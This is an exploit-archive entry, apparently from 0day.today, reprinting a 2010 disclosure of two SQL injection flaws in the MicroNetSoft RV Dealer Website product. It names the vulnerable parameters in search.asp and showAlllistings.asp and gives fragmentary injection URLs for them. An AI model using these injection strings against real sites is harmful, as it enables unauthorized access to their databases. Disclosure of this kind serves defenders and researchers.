id: 14996
date: 11/30/2010
title: MicroNetSoft RV Dealer Website SQL Injection Vulnerability
author: n/a
cves: 

==========================================================
MicroNetSoft RV Dealer Website SQL Injection Vulnerability
==========================================================

TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
 
SQL INJECTION BUGS:
 
http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union



#  0day.today [2023-03-25]  #